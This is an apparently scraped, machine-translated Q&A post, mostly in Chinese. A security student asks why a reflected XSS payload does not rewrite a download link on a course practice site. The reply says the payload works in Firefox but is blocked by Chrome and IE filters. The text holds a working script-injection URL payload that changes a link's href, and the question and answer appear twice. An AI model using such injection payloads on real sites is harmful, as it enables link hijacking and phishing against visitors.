为什么我对虚拟网站的 XSS 攻击不起作用?
Why isn't my XSS attack on a dummy website working?
在我的安全课程中,我们得到了一个虚拟网站来练习 xss 攻击:
http://permalink.co/multivac/biteme.php
别担心,这个网站是用来练习的,它只是在特定学生的电脑上临时改变,之后总是会重置回原来的样子。
我想将 "click to download" 下的 url 更改为在单击时指向 google。我锁定下面的代码,但 link 没有改变。我复制粘贴在“.php”之后;
?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.google.com/";}</script>
我从来没有得到 url 改变,我该怎么办?
http://permalink.co/multivac/biteme.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.google.com/";}</script>
它工作正常,我认为你正在使用 google chrome ,chrome 防止 xss(见截图),
与 Internet Explorer(11.0) 相同的体验,它也可以防止 xss
我在 firefox(34.0.5) 中测试过,它的工作原理
在我的安全课程中,我们得到了一个虚拟网站来练习 xss 攻击:
http://permalink.co/multivac/biteme.php
别担心,这个网站是用来练习的,它只是在特定学生的电脑上临时改变,之后总是会重置回原来的样子。
我想将 "click to download" 下的 url 更改为在单击时指向 google。我锁定下面的代码,但 link 没有改变。我复制粘贴在“.php”之后;
?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.google.com/";}</script>
我从来没有得到 url 改变,我该怎么办?
http://permalink.co/multivac/biteme.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.google.com/";}</script>
它工作正常,我认为你正在使用 google chrome ,chrome 防止 xss(见截图),
我在 firefox(34.0.5) 中测试过,它的工作原理